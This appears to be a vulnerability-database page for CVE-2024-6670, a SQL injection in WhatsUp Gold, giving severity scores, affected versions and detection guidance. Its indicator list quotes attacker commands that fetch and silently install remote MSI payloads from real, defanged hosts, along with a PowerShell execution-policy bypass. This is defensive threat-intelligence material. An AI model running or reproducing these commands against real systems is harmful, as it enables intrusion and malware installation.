cbcvebase.
CVE-2024-6670
published 2024-08-29

CVE-2024-6670: In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.

PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2024-10-07
Exploited in the wild
EPSS
94.66%
99.8th percentile
In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.

Affected

2 ranges
VendorProductVersion rangeFixed in
progresswhatsup_gold< 24.024.0
progress_software_corporationwhatsup_gold>= 2023.1.0 < 2024.0.02024.0.0

Detection & IOCsextracted from sources · hover to see the quote

urlhxxps://webhook[.]site/b6ef7410-9ec8-44f7-8cdf-7890c1cf5837
ip45.227.255.216
urlhxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi
port29742
domainfedko[.]org
urlhxxps://fedko[.]org/wp-includes/ID3/setup.msi
ip185.123.100.160
urlhxxp://185.123.100[.]160/access/Remote Access-windows64-offline.exe?language=en&app=61021689825303726412222891579678345108&hostname=hxxp://185.123.100[.]160
pathc:\programdata\a.ps1
pathC:\programdata\ftpd32.exe
pathc:\windows\temp\MSsetup.msi
processNmPoller.exe
filenameftpd32.exe
commandpowershell -exec bypass -file c:\programdata\a.ps1
commandmsiexec /i hxxps://fedko[.]org/wp-includes/ID3/setup.msi /Qn
commandmsiexec /i hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi /Qn
  • Use the following Trend Vision One / Endpoint Activity Data query to hunt for suspicious NmPoller.exe activity: "nmpoller.exe" AND eventSubId:(2 OR 101 OR 109 OR 901)
  • Detect the presence of ftpd32.exe in C:\programdata\ as a dropped RAT payload associated with post-exploitation activity following CVE-2024-6670 exploitation.
  • The Metasploit module auxiliary/admin/http/whatsup_gold_sqli.rb exploits CVE-2024-6670 by overwriting the password of an existing WhatsUp Gold user (e.g., the default admin account) via SQL injection. Detect exploitation attempts targeting WhatsUp Gold HTTP endpoints.
  • ·The exploit (as demonstrated by the public PoC) overwrites the administrator password rather than simply reading it, enabling full account takeover. Detection should account for unexpected password changes on admin accounts, not just data exfiltration.
  • ·NmPoller.exe process monitoring will also surface benign events such as product restarts and daily log file creation; baseline normal activity before alerting on all child process events.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.